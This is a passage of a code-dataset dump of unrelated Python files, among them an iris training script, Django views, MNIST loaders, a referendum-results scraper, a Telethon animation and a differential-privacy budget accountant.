x[:40],x[50:90]\nx_test[:10],x_test[10:] = x[40:50],x[90:100]\ny_train[:40],y_train[40:] = y[:40],y[50:90]\ny_test[:10],y_test[10:] = y[40:50],y[90:100]\n\n#4-3-3 節:定義函式\n\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\ndef activation(x, w, b):\n return sigmoid(np.dot(x, w)+b)\n\ndef update(x, y_train, w, b, eta): \n y_pred = activation(x, w, b)\n a = (y_pred - y_train) * y_pred * (1- y_pred)\n for i in range(4):\n w[i] -= eta * 1/float(len(y)) * np.sum(a*x[:,i])\n b -= eta * 1/float(len(y))*np.sum(a)\n return w, b\n\n\n#4-3-4 節:進行訓練\n \nweights = np.ones(4)/10 \nbias = np.ones(1)/10 \neta=0.1\nfor _ in range(100): \n\tweights, bias = update(x_train, y_train, weights, bias, eta=0.1)\nprint('weights = ', weights, 'bias = ', bias)\n","sub_path":"F9373/ch04-3/iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"429279760","text":"from django.shortcuts import render\nimport json\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.http import Http404\nfrom django.shortcuts import render\nfrom h.models import *\nfrom firstApp.models import *\nfrom templates import *\nimport os\nimport uuid\n\n# Create your views here.\ndef change(request):\n q=str(uuid.uuid4())\n\n form=request.FILES[\"pic\"].content_type.split(\"/\")[request.FILES[\"pic\"].content_type.split(\"/\").__len__()-1]\n\n while(os.path.exists(\"/Users/hossainaboutalebi/PycharmProjects/fazz/static/\"+q+\".\"+form)):\n q=str(uuid.uuid4())\n\n file = open(\"/Users/hossainaboutalebi/PycharmProjects/fazz/static/\"+q+\".\"+form, 'bw+')\n address=q+\".\"+form\n request_file = request.FILES['pic']\n print(request.FILES['pic'])\n for chunck in request_file.chunks():\n print(len(chunck))\n file.write(chunck)\n\n address=\"http://127.0.0.1:8000/static/\"+address\n f=urls(id=q,Name=address);\n f.save();\n content={\"id\":q}\n file.close()\n return HttpResponse(json.dumps(content),content_type='application/json')\ndef fin(request,id):\n\n iddd=id\n a=urls.objects.filter(id=iddd)\n v=a[0].Name\n a=SubCategory.objects.all()\n return render(request,\"FinalTaqhiir.html\",{\"image\":v,\"kitkat\":a})\n\ndef show(request):\n a=SubCategory.objects.all()\n return render(request,\"Taqhiirat.html\",{\"kitkat\":a})\n\n\ndef sub(request):\n\n print(\"asdsad\")\n f=Products(Name=request.POST[\"name\"],Price=request.POST[\"price\"],SubCategoryName=SubCategory.objects.filter(Name=request.POST[\"category\"])[0],picUrlProduct=request.POST[\"picId\"],Description=request.POST[\"description\"],Popularity=\"low\")\n f.save();\n\n return\n\ndef changePro(request):\n kitkatPP=Products.objects.all()\n a=SubCategory.objects.all()\n return render(request,\"MahsoolChange.html\",{\"kitkat\":a,\"kitkatP\":kitkatPP})\n\ndef Trans(request):\n kitkatPP=Products.objects.all()\n return render(request,\"trakonesh.html\",{\"kitkatP\":kitkatPP})\n\n","sub_path":"fazz/firstApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"379364244","text":"# -*- coding: utf-8 -*-\n\"\"\"\nパラメータ置き場\n================\n\n\"\"\"\n\n# import standard libraries\nimport os\n\n# import third-party libraries\n\n# import my libraries\nimport color_space as cs\n\n# information\n__author__ = 'Toru Yoshihara'\n__copyright__ = 'Copyright (C) 2020 - Toru Yoshihara'\n__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Toru Yoshihara'\n__email__ = 'toru.ver.11 at-sign gmail.com'\n\n__all__ = []\n\n\nL_SAMPLE_NUM_MAX = 8192\nH_SAMPLE_NUM_MAX = 8192\n\nGAMUT_BOUNDARY_LUT_LUMINANCE_SAMPLE = 1024\nGAMUT_BOUNDARY_LUT_HUE_SAMPLE = 1024\nCHROMA_MAP_DEGREE_SAMPLE_NUM = 1024\n\nDIPS_150_SAMPLE_ST_BT2020 = int(115/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_150_SAMPLE_ED_BT2020 = int(160/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_300_SAMPLE_ST_BT2020 = int(270/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_300_SAMPLE_ED_BT2020 = int(324/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\n\nDIPS_150_SAMPLE_ST_P3 = int(115/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_150_SAMPLE_ED_P3 = int(160/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_300_SAMPLE_ST_P3 = int(325/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_300_SAMPLE_ED_P3 = int(359/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\n\n# BT.2407 の FIGURE A2-4 を見ると 240° くらいで終わってるので…\nL_FOCAL_240_INDEX_BT2020 = int(240/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nL_FOCAL_240_INDEX_P3 = int(225/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\n\nC_FOCAL_MAX_VALUE = 5000\nLPF_WN_PARAM = 0.4 * (256/GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nLPF_NN_PARAM = int(4 * (GAMUT_BOUNDARY_LUT_HUE_SAMPLE/256) + 0.5)\n\n\ndef get_gamut_boundary_lut_name(\n color_space_name=cs.BT709,\n luminance_sample_num=GAMUT_BOUNDARY_LUT_LUMINANCE_SAMPLE,\n hue_sample_num=GAMUT_BOUNDARY_LUT_HUE_SAMPLE):\n name = f\"./luts/GamutBoundaryLUT_{color_space_name}_\"\\\n + f\"L_{luminance_sample_num}_H_{hue_sample_num}.npy\"\n return name\n\n\ndef get_chroma_map_lut_name(\n outer_color_space_name=cs.BT2020,\n inner_color_space_name=cs.BT709,\n luminance_sample_num=GAMUT_BOUNDARY_LUT_LUMINANCE_SAMPLE,\n hue_sample_num=GAMUT_BOUNDARY_LUT_HUE_SAMPLE,\n focal_type=\"Lfocal\"):\n name = f\"./luts/ChromaMap{focal_type}LUT_{outer_color_space_name}_to_\"\\\n + f\"{inner_color_space_name}_\"\\\n + f\"L_{luminance_sample_num}_H_{hue_sample_num}.npy\"\n return name\n\n\ndef get_l_cusp_name(\n outer_color_space_name=cs.BT2020,\n inner_color_space_name=cs.BT709,\n luminance_sample_num=GAMUT_BOUNDARY_LUT_LUMINANCE_SAMPLE,\n hue_sample_num=GAMUT_BOUNDARY_LUT_HUE_SAMPLE):\n name = f\"./luts/LCuspLUT_{outer_color_space_name}_to_\"\\\n + f\"{inner_color_space_name}_\"\\\n + f\"L_{luminance_sample_num}_H_{hue_sample_num}.npy\"\n return name\n\n\ndef get_focal_name(\n outer_color_space_name=cs.BT2020,\n inner_color_space_name=cs.BT709,\n luminance_sample_num=GAMUT_BOUNDARY_LUT_LUMINANCE_SAMPLE,\n hue_sample_num=GAMUT_BOUNDARY_LUT_HUE_SAMPLE,\n focal_type=\"Lfocal\"):\n name = f\"./luts/{focal_type}LUT_{outer_color_space_name}_to_\"\\\n + f\"{inner_color_space_name}_\"\\\n + f\"L_{luminance_sample_num}_H_{hue_sample_num}.npy\"\n return name\n\n\nif __name__ == '__main__':\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n print(get_gamut_boundary_lut_name(cs.BT709, 10, 20))\n","sub_path":"2020/020_explain_BT2407/bt2407_parameters.py","file_name":"bt2407_parameters.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"318698167","text":"import pytest\nfrom typecasts import Typecasts, casts\n\nfrom platonic.sqs.queue import SQSSender\nfrom platonic.sqs.queue.errors import SQSQueueURLNotSpecified\n\nOWN_TYPECASTS = Typecasts()\n\n\nclass MyStaticSender(SQSSender[int]):\n \"\"\"Initialize URL and internal type statically.\"\"\"\n\n url = 'foo'\n internal_type = bytes\n\n\nclass MyStaticTypecastsSender(SQSSender[int]):\n \"\"\"Initialize URL and internal type statically.\"\"\"\n\n url = 'foo'\n typecasts = OWN_TYPECASTS\n\n\nclass MyDynamicSender(SQSSender[int]):\n \"\"\"Will initialize URL and internal type dynamically.\"\"\"\n\n\ndef test_no_url():\n with pytest.raises(SQSQueueURLNotSpecified) as err:\n MyDynamicSender()\n\n assert 'sqs' in str(err.value) # noqa: WPS441\n\n\ndef test_initialize_typecasts():\n \"\"\"Typecasts.\"\"\"\n sender = MyStaticTypecastsSender(url='boo')\n assert sender.typecasts == OWN_TYPECASTS\n\n\ndef test_initialize_dynamically():\n \"\"\"Instantiate a sender class and provide the URL.\"\"\"\n my_casts = Typecasts()\n sender = MyDynamicSender(url='...', internal_type=bytes, typecasts=my_casts)\n assert sender.url == '...'\n assert sender.internal_type == bytes\n assert sender.typecasts == my_casts\n\n\ndef test_initialize_statically():\n \"\"\"Instantiate a sender class where URL is already specified.\"\"\"\n sender = MyStaticSender()\n assert sender.url == 'foo'\n assert sender.internal_type == bytes\n assert sender.typecasts == casts\n assert sender.client is not None\n","sub_path":"tests/test_queue/test_initialize.py","file_name":"test_initialize.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"97956481","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 30 16:17:51 2018\n\n@author: Camel\n\"\"\"\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nfrom selenium import webdriver\ndriver = webdriver.Chrome()\ndriver.get('http://referendum.2018.nat.gov.tw/pc/zh_TW/01/63000000100000000.html')\n\n\ndef getRef(url):\n \"-------------------取得區域資料-----------------\"\n res = requests.get(url)\n soup = BeautifulSoup(res.text, 'lxml')\n dfs = pd.read_html(res.text)\n \n \"-------------------取得投票資料-----------------\"\n votes = dfs[2]\n votes.columns=votes.loc[1]\n votes.drop([0,1,3,4] , inplace=True)\n votes.reset_index(drop=True, inplace=True)\n\n totalvotes = dfs[3]\n totalvotes.columns = totalvotes.loc[0]\n totalvotes.drop([0,2,3], inplace=True)\n totalvotes.reset_index(drop=True, inplace=True)\n\n mat = pd.concat([votes,totalvotes],axis=1)\n area= soup.select_one('b').text\n mat['投票地區'] = area\n writer = pd.ExcelWriter('output.xlsx')\n mat.to_excel(writer,'Sheet2') \n writer.save()\n return mat\n\n\nsoup = BeautifulSoup(driver.page_source, 'lxml')\nall_countries_links = soup.select('div[id^=item] a')\n\ndomain = 'http://referendum.2018.nat.gov.tw/pc/zh_TW'\nresults=[]\n\"請輸入欲查詢之網址\"\ngetRef('http://referendum.2018.nat.gov.tw/pc/zh_TW/01/63000000200000000.html')\nfor ele in all_countries_links[0:13]:\n try: #除錯語法\n results.append(getRef(domain + ele.get('href').strip('.'))) #看看getRef中是否有href標籤,若無則到except條件句執行\n except: #若try有錯\n print(domain + ele.get('href').strip('.')) #只有第一項連結有問題\n else:\n writer = pd.ExcelWriter('output1.xlsx')\n for i in range(len(results)):\n (results[i]).to_excel(writer,'第'+str(i+1)+'區選舉實況')\n writer.save()","sub_path":"API_project7.py","file_name":"API_project7.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"477722702","text":"\n\n#calss header\nclass _LION():\n\tdef __init__(self,): \n\t\tself.name = \"LION\"\n\t\tself.definitions = [u'a large wild animal of the cat family with yellowish-brown fur that lives in Africa and southern Asia: ', u'someone who is important, successful, or powerful: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_lion.py","file_name":"_lion.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"506909266","text":"import gzip\nimport logging\nimport os\nimport shutil\nimport tensorflow as tf\nfrom six.moves import urllib\n\nMNIST_MIRROR = 'http://yann.lecun.com/exdb/mnist/'\nFI = ['train-images-idx3-ubyte', 'train-labels-idx1-ubyte', 't10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte']\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(\"MnistLoader\")\n\n\ndef download(download_links, zipped_paths):\n for link, zipped_path in zip(download_links, zipped_paths):\n logger.info('Downloading {} to {}'.format(link, zipped_path))\n urllib.request.urlretrieve(link, zipped_path)\n\n\ndef extract(zipped_paths, extracted_paths):\n for zipped_path, extracted_path in zip(zipped_paths, extracted_paths):\n with gzip.open(zipped_path, 'rb') as file_in, tf.gfile.Open(extracted_path, 'wb') as file_out:\n logger.info('Extracting {}'.format(zipped_path))\n shutil.copyfileobj(file_in, file_out)\n\n\ndef remove(zipped_paths):\n for zipped_path in zipped_paths:\n logger.info('Removing {}'.format(zipped_path))\n os.remove(zipped_path)\n\n\ndef decode_image_mlp(image):\n image = tf.decode_raw(image, tf.uint8)\n image = tf.cast(image, tf.float32)\n image = tf.reshape(image, [784])\n return image / 255.0\n\n\ndef decode_image_cnn(image):\n image = tf.decode_raw(image, tf.uint8)\n image = tf.cast(image, tf.float32)\n image = tf.reshape(image, [28, 28, 1])\n return image / 255.0\n\n\ndef decode_label(label):\n label = tf.decode_raw(label, tf.uint8)\n label = tf.reshape(label, [])\n label = tf.one_hot(label, 10)\n return label\n\n\ndef get_dataset(images_file, labels_file, decode_image, cores):\n images = tf.data.FixedLengthRecordDataset(images_file, 28 * 28, header_bytes=16)\n images = images.map(decode_image, num_parallel_calls=cores)\n\n labels = tf.data.FixedLengthRecordDataset(labels_file, 1, header_bytes=8)\n labels = labels.map(decode_label, num_parallel_calls=cores)\n return tf.data.Dataset.zip((images, labels))\n\n\ndef get_inputs(images_file, labels_file, batch_size, buffer_size, prefetch, cores, decode_image):\n dataset = get_dataset(images_file, labels_file, decode_image, cores)\n dataset = dataset.shuffle(buffer_size)\n dataset = dataset.batch(batch_size)\n dataset = dataset.prefetch(prefetch)\n iterator = dataset.make_initializable_iterator()\n images, labels = iterator.get_next()\n iterator_init_op = iterator.initializer\n\n return images, labels, iterator_init_op\n\n\ndef get_inputs_mlp(images_file, labels_file, batch_size, prefetch, cores, buffer_size):\n return get_inputs(images_file, labels_file, batch_size, prefetch, cores, buffer_size, decode_image_mlp)\n\n\ndef get_inputs_cnn(images_file, labels_file, batch_size, prefetch, cores, buffer_size):\n return get_inputs(images_file, labels_file, batch_size, prefetch, cores, buffer_size, decode_image_cnn)\n\n\ndef download_missing_files(directory, files_to_download):\n download_links = [os.path.join(MNIST_MIRROR, filename + '.gz') for filename in files_to_download]\n zipped_paths = [os.path.join(directory, filename + '.gz') for filename in files_to_download]\n extracted_paths = [os.path.join(directory, filename) for filename in files_to_download]\n download(download_links, zipped_paths)\n extract(zipped_paths, extracted_paths)\n remove(zipped_paths)\n\n\ndef paget(directory, build_inputs, batch_size, prefetch, cores):\n files = [os.path.join(directory, filename) for filename in FI]\n files_to_download = [filename for filename in FI if not tf.gfile.Exists(os.path.join(directory, filename))]\n\n if files_to_download:\n download_missing_files(directory, files_to_download)\n\n train_images, train_labels, train_iterator_init = build_inputs(files[0], files[1], batch_size, prefetch, cores, 60000)\n test_images, test_labels, test_iterator_init = build_inputs(files[2], files[3], batch_size, prefetch, cores, 10000)\n\n return train_images, train_labels, train_iterator_init, test_images, test_labels, test_iterator_init\n\n\ndef paget_mlp(directory, batch_size, prefetch, cores):\n return paget(directory, get_inputs_mlp, batch_size, prefetch, cores)\n\n\ndef paget_cnn(directory, batch_size, prefetch, cores):\n return paget(directory, get_inputs_cnn, batch_size, prefetch, cores)\n\n\nif __name__ == '__main__':\n destination = '/Users/Piotr/Workspace/DataScience/pokedex/datasets'\n\n # images, labels, iterator_init_op = get_inputs_mlp(extracted_paths[0], extracted_paths[1], 10, 60000)\n # with tf.Session() as sess:\n # sess.run(iterator_init_op)\n # im, la = sess.run([images, labels])\n # print(im.shape)\n\n x_train, y_train, init_train, x_test, y_test, init_test = paget_cnn(destination, 32, prefetch=2, cores=4)\n\n with tf.Session() as sess:\n sess.run([init_train, init_test])\n\n print(sess.run(x_train).shape)\n print(sess.run(y_train).shape)\n","sub_path":"datasets/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"108184103","text":"#!/usr/bin/env python\n# Auther:youzibaby\n\nmoney = int(input(\"请输入资金>>>\"))\nshop_list = '''\n请输入您要购买的商品编号,退出请输入q。\n1 Iphone 6000 \n2 Mac book 12000 \n3 Bike 800 \n4 LV bag 2000\n'''\nshop_price = [0,[\"Iphone\",6000],[\"Mac book\",12000],[\"Bike\",800],[\"LV bag\",2000]]\nshop_car = []\nmenu_flag = False\n\nwhile menu_flag != True:\n print(shop_list)\n shop_lock = input(\"请输入商品编号>>>\")\n if shop_lock != \"q\":\n shop = shop_price[int(shop_lock)]\n if money > shop[1]:\n shop_car.append(shop[0])\n money = money - shop[1]\n else:\n print(\"钱不够\")\n else:\n menu_flag = True\nelse:\n if shop_car == []:\n print(\"您啥也没买。\")\n else:\n print(\"您购买了以下产品:余额%d\"%money,\"\\n\",shop_car)\n\n\n\n\n\n","sub_path":"s14/day2/shopping1.py","file_name":"shopping1.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"504725358","text":"# -*- coding: utf-8 -*-\n\n#############################################\n# dependencies #\n#############################################\n\nimport sys\nimport os.path\nimport numpy as np\n# others\nimport global_vars as g\n\n#############################################\n# code #\n#############################################\n\n\n\n#===========================================#\n# function save:\n# in: int i_epoch, nb_epochs & save_frequency: used to know if it is time to save\n# int i_simul: how many simulsations to save (in term of networks weights)\n# array save_header: what to save first\n# out: the save path if saved, else the boelean False \n#-------------------------------------------#\n# Saves the global_save into a file save_path.\n# The file is created if it doesn't exists.\n#-------------------------------------------#\n# What do we want about the weights ?\n# --> to update the networks' weights\n# So we arrange the global_load into a list of weights,\n# orderer by increasing number of simulation then\n# by increasing id_network, so at each new simulation\n# we just have to pop the begining of global_load into\n# the networks' weights\n#===========================================#\n\ndef save(save_path, i_epoch, nb_epochs, i_simul, save_frequency, save_header) :\n if save_path is None:\n return False\n g.global_save = []\n if (i_epoch%save_frequency) == 0 or (i_epoch == nb_epochs-1): # We want to save at the frequency save_frequency\n # and at the last epoch.\n for i_net in range(1, g.nb_networks-1): # Saving all networks.\n g.networks_weights[i_simul][i_net] = g.networks[i_net].weights # Updating the weights from the networks themselves for this simulation\n g.global_save += save_header # Erasing former save /!\\ need a copy\n for simul in range(i_simul+1): # we want to save the previous and the current simuls, so range(i_simul+1)\n for net in range(g.nb_networks):\n g.global_save.append( g.networks_weights[simul][net] ) # Update the current weights.\n\n user_name = save_header[6][0]\n game_name = save_header[6][1]\n np.savez(save_path, *g.global_save)\n\n return save_path\n else:\n return False\n\n\n \n#===========================================#\n# function load:\n# in: a path \".../file.npz\" to load\n# out: the params needed to run multi_networks,\n#-------------------------------------------#\n# Loads the file \"path\", extracts the informations\n# to run the function multi_networks() with the\n# correct parameters, and global_path contains the\n# weights of the networks for each simulation.\n# Raise an exception if the path is incorrect.\n#-------------------------------------------#\n# What do we want about the weights ?\n# --> to update the networks' weights\n# we arrange the global_load into a list of weights,\n# orderer by increasing number of simulation, then\n# by increasing id_network, so at each new simulation\n# we just have to pop the begining of global_load into\n# the networks' weights\n#===========================================#\n\ndef load(path):\n g.global_load = []\n if os.path.isfile(path) : # the file exists\n npzfile = np.load(path) # this doesn't load in the correct order, so we have to reorder it\n _load = ['arr_{}'.format(i) for i in range(len(npzfile.files))] # reordered\n g.global_load = [npzfile[i] for i in _load] # loaded in good order\n\n # extracting the header # When the header is extracted, the weights remain and will be load during the multi_networks() function \n # --------------------- # because we need the instantiated networks to update their weights.\n params = []\n for i in range(6): # concerns all the \"global_***_arrays\"\n params.append(g.global_load.pop(0))\n _load = g.global_load.pop(0) # It concatenates with an array which contains: user_name, g.nb_networks, game_name, game_observation_size, game_decision_size, max_score, nb_epochs, nb_simulations, save_frequency, rl_gamma and rl_epsilon.\n params.append(_load[0]) # user\n params.append(_load[1]) # game\n params.append(int(_load[2])) # observation_size\n params.append(int(_load[3])) # decision_size\n params.append(int(_load[4])) # max_score\n params.append(int(_load[5])) # nb_epochs\n params.append(int(_load[6])) # nb_simulations\n params.append(int(_load[7])) # save_freq\n params.append(float(_load[8])) # rl_gamma\n params.append(float(_load[9])) # rl_epsilon\n params += [True] # Last parameter: was_loaded = True.\n # --------------------- header extracted\n \n return params\n else:\n raise Exception('Uncorrect path to load')\n \n \n","sub_path":"neuronit/back_end/save_and_load.py","file_name":"save_and_load.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"103726348","text":"#!/Users/suzinyou/anaconda3/bin/python\n# -*- coding: utf-8 -*-\n\nimport re\n\n\"\"\" Use the following regexes in the order presented. \"\"\"\nR_URL = re.compile(r'https?://[-.?&~;+=/#\\w]{1,2076}')\nR_EMAIL = re.compile(r'[-_.0-9A-Za-z]{1,64}@[-_0-9A-Za-z]{1,255}[-_.0-9A-Za-z]{1,255}')\nR_TWT = re.compile(r'(?<=^|(?<=[^a-zA-Z0-9-_\\.]))@([A-Za-z]+[A-Za-z0-9]+)')\nR_HASHTAG = re.compile(r'#[^\\s]+')\n# R_NUMS = re.compile(r'([\\d]+[,.\\-])*[\\d]+')\n# R_SPEC = re.compile(r'[\\,.\\\"¿??¡!!\\-_=+`~〜/\\\\::;|@#$%^&*†‡※°()()\\[\\][]\\{}{}【】《》〈〉<>‹›«»‧•「」『』©™\\u20A0-\\u20CF]+')\n# Note: R_SPEC does NOT include apostrophe (\"\\'\").\n# R_PUNC = re.compile(r'[,.\\'\"¿??¡!]+') # common punctuation marks\nR_WS = re.compile(r'[\\s]+')\n\n\"\"\" Regex for alphabet unicode \"\"\"\nlatin_chars = r'[\\u0041-\\u005A\\u0061-\\u007A\\u00C0-\\u00D6\\u00D8-\\u00F6\\u00F8-\\u00FF]'\nR_LA = re.compile(r'{block}+\\'{block}+|{block}+'.format(block=latin_chars)) # Latin\nR_RU = re.compile(r'[\\u0400-\\u04FF\\u0500-\\u052F]+') # Russian cyrillic\nR_AR = re.compile(r'[\\u0600-\\u06FF\\u0750-\\u077F\\u08A0–\\u08FF\\uFB50–\\uFDFF\\uFE70–\\uFEFF]+') # Arabic\nR_HI = re.compile(r'[\\u0900-\\u097F]+') # Hindi\nR_JA = re.compile(r'[\\u3001\\u3002\\u3041-\\u390f\\u30a0-\\u30ff]+') # Japanese\nR_KO = re.compile(r'[\\u3131-\\u318e\\uac00-\\ud7a3\\u1100-\\u11ff]+') # Korean\nR_ZH = re.compile(r'[\\u4E00-\\u9FFF\\u3400-\\u4DBF\\uF900-\\uFAFF]+')\nR_TH = re.compile(r'[\\u0e01-\\u0e5b]+') # Thai\n\n\"\"\" Dictionary for each language/alphabet-set regex \"\"\"\nlang_range = {'la':R_LA,\n 'ru':R_RU, \n 'ar': R_AR, \n 'hi': R_HI, \n 'zh': R_ZH,\n 'ja': R_JA, \n 'ko': R_KO,\n 'th': R_TH\n}\n","sub_path":"src/unicode_regex.py","file_name":"unicode_regex.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"79270388","text":"\n\n# Edited for FTg by demenkop\n\n\nfrom telethon import events\nimport asyncio\n\n@borg.on(events.NewMessage(pattern=r\"\\.ding\", outgoing=True))\n\nasync def _(event):\n if event.fwd_from:\n return\n\n animation_interval = 0.3\n animation_ttl = range(0, 10)\n input_str = event.pattern_match.group(1)\n animation_chars = [\n \"🔴⬛⬛⬜⬜\\n⬜⬜⬜⬜⬜\\n⬜⬜⬜⬜⬜\",\n \"⬜⬜⬛⬜⬜\\n⬜⬛⬜⬜⬜\\n🔴⬜⬜⬜⬜\",\n \"⬜⬜⬛⬜⬜\\n⬜⬜⬛⬜⬜\\n⬜⬜🔴⬜⬜\",\n \"⬜⬜⬛⬜⬜\\n⬜⬜⬜⬛⬜\\n⬜⬜⬜⬜🔴\",\n \"⬜⬜⬛⬛🔴\\n⬜⬜⬜⬜⬜\\n⬜⬜⬜⬜⬜\", \n \"⬜⬜⬛⬜⬜\\n⬜⬜⬜⬛⬜\\n⬜⬜⬜⬜🔴\",\n \"⬜⬜⬛⬜⬜\\n⬜⬜⬛⬜⬜\\n⬜⬜🔴⬜⬜\",\n \"⬜⬜⬛⬜⬜\\n⬜⬛⬜⬜⬜\\n🔴⬜⬜⬜⬜\",\n \"🔴⬛⬛⬜⬜\\n⬜⬜⬜⬜⬜\\n⬜⬜⬜⬜⬜\",\n \"⬜⬜⬜⬜⬜\\n⬜ [Demenkop](http://t.me/demenkop) ⬜\\n⬜⬜⬜⬜⬜\"\n ]\n for i in animation_ttl:\n await asyncio.sleep(animation_interval)\n await event.edit(animation_chars[i % 10])\n","sub_path":"ding.py","file_name":"ding.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"632936081","text":"\nimport numpy as np\nimport copy\nimport math\n\nfrom tensorflow_privacy.privacy.analysis import compute_dp_sgd_privacy_lib\n\nclass BudgetsAccountant:\n def __init__(self, N, eps_list, delta, noise_multiplier, comm_gap, priv_threshold, accumulation=None):\n self._init = copy.deepcopy(eps_list)\n self._public = list(np.where(np.array(self._init) >= priv_threshold)[0])\n self._private = list(set(range(N)).difference(set(self._public)))\n self._remainder = copy.deepcopy(eps_list)\n\n if accumulation is None:\n self._accumulation = [0] * N\n else:\n self._accumulation = accumulation\n\n self._step_accum = [0] * N\n self._tmp_accum = [0] * N\n self._delta = delta\n self._tmp_delta = [0] * N\n self._round = [0] * N\n self._comm_gap = comm_gap\n self._finished = [False] * N\n self._noise_multiplier = noise_multiplier\n self._global_budgets = []\n\n def set_finished(self, client_id):\n self._finished[client_id] = True\n\n def get_finished(self):\n return self._finished\n\n def precheck(self, N, client_set, batch_size):\n idx = np.where(np.array(self._finished) == False)[0].tolist()\n s = []\n\n for c in idx:\n\n tmp_round = self._round[c] + self._comm_gap\n# if self._step_accum[c] == 0:\n '''\n tmp_delta, _ = compute_dp_sgd_privacy_lib.compute_dp_sgd_privacy(\n len(client_set[c]), FLAGS.client_batch_size, self._noise_multiplier[c],\n tmp_round * int(FLAGS.client_epochs_per_round), eps=self._init[c]/FLAGS.max_comm_round)\n '''\n '''\n tmp_accum, _ = compute_dp_sgd_privacy_lib.compute_dp_sgd_privacy(\n len(client_set[c]), batch_size, self._noise_multiplier[c],\n tmp_round, float(self._delta))\n '''\n q = batch_size*1.0 / len(client_set[c])\n# print(q, tmp_round)\n tmp_accum = 10 * q * math.sqrt(tmp_round*(-math.log10(self._delta))) / self._noise_multiplier[c]\n #tmp_accum = tmp_round * self._step_accum[c]\n# print(c, tmp_accum)\n if tmp_accum > self._init[c]:\n self.set_finished(c)\n else:\n s.append(c)\n self._tmp_accum[c] = tmp_accum\n #self._tmp_accum[c] = (self._init[c]/FLAGS.max_comm_round)*tmp_round\n #self._tmp_delta[c] = self._delta\n #print(s)\n return s\n\n def get_remainder(self):\n return self._remainder\n\n def get_accumulation(self, client_id):\n return self._accumulation[client_id]\n\n def set_global_budget(self):\n self._global_budgets.append(min(self._accumulation))\n\n def get_global_budget(self):\n return self._global_budgets\n\n def update(self, clients_id):\n #print('update: ', clients_id) \n for c in clients_id:\n self._round[c] += self._comm_gap\n self._remainder[c] = self._init[c]-self._tmp_accum[c]\n self._accumulation[c] = self._tmp_accum[c]\n self._tmp_accum[c] = 0\n\n\n self.set_global_budget()\n #print('global_budgets:', self._global_budgets)\n \n","sub_path":"budgets_accountant.py","file_name":"budgets_accountant.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"150387012","text":"import pandas as pd\nfrom ggplot import *\nfrom numpy import nan\nfrom test import U_test\nfrom dmath import shannon\nfrom dmath import dshannon\n\n'''\n对所选择的列进行描述性统计\n:return dict\n@data 数据,格式要求列表或者DataFrame\n@colname 要统计的列名\n@dtype 数据类型,continuous 或者 discrete,默认为continuous.\n@stat 统计内容,means:基本统计包含 最大值,最小值,均值,标准差,空缺值频数,以及分布图,默认为means\n@NaNaction 空缺值的处理方式,N:忽略,默认为忽略.\n@p 打印输出:0~不打印,~打印,默认为打印.\n'''\ndef feature_stater(data,colname,dtype=\"continuous\",stat=\"means\",NaNaction=\"n\",p=1,**kwargs):\n if data.__class__==list:\n data=pd.DataFrame(data)\n if NaNaction.lower()==\"n\":\n if dtype.lower()==\"continuous\":\n return draw_ctn(data,colname,stat=stat,p=p,**kwargs)\n elif dtype.lower()==\"discrete\":\n return draw_dsct(data,colname,p=p,stat=stat)\n else:\n print(\"please convert to list or DataFrame\")\n\n\n'''\n对连续类型的列进行描述性统计\n:return dict\n@data 数据,格式要求列表或者DataFrame\n@colname 要统计的列名\n@stat 统计内容,means:基本统计包含 